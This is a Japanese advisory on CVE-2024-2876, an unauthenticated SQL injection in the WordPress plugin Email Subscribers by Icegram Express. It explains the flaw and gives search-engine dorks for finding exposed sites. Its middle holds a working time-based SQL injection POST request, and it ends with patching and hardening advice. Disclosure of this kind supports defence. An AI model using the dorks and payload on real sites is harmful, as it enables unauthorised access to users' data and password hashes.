
CVE-2024-2876の概念実証エクスプロイト。Icegram Express製WordPressプラグイン「Email Subscribers」における深刻なSQLインジェクションで、認証されていない攻撃者が任意のSQLクエリを実行できるようにします。
CVE-2024-2876 は、WordPress 用プラグイン「Email Subscribers by Icegram Express」で発見された重大なセキュリティ脆弱性です。この脆弱性はバージョン 5.7.14 以前に影響し、90,000以上のウェブサイトに重大なリスクをもたらします。
この脆弱性はSQLインジェクションの欠陥であり、認証されていない攻撃者が影響を受ける WordPress データベース上で悪意のあるSQLクエリを実行できるようにします。適切にサニタイズされていないユーザー入力を操作することで、攻撃者はユーザー名、メールアドレス、パスワードハッシュ、購読者リストなどの機密情報を抽出できます。
SQLインジェクションは、プラグインの IG_ES_Subscribers_Query クラスの run 関数内で発生し、不十分な入力検証により不正なSQLコードの実行が可能になります。これにより、WordPress データベースに保存されたデータの整合性と機密性が損なわれます。
FOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
即時アップデート: 「Email Subscribers by Icegram Express」プラグインを使用している場合は、セキュリティ修正を適用するために直ちにバージョン 5.7.15 以降へアップグレードしてください。
定期的な監査: セキュリティを確保するために、すべての WordPress プラグインとテーマを定期的に確認し、最新バージョンに更新してください。
セキュリティプラグイン: SQLインジェクションやその他のサイバー脅威に対する防御を強化するために、信頼できる WordPress セキュリティプラグインを使用してください。
強力なパスワードポリシー: WordPress サイトに関連するすべてのアカウントに強力で一意なパスワードを実装し、不正アクセスのリスクを軽減してください。
影響を受けるプラグインを更新しない場合、ウェブサイトがデータ侵害や不正アクセスに対して脆弱な状態のままになる可能性があります。このプラグインが広く使用されていることを考慮すると、インストールを保護するために直ちに対応することが重要です。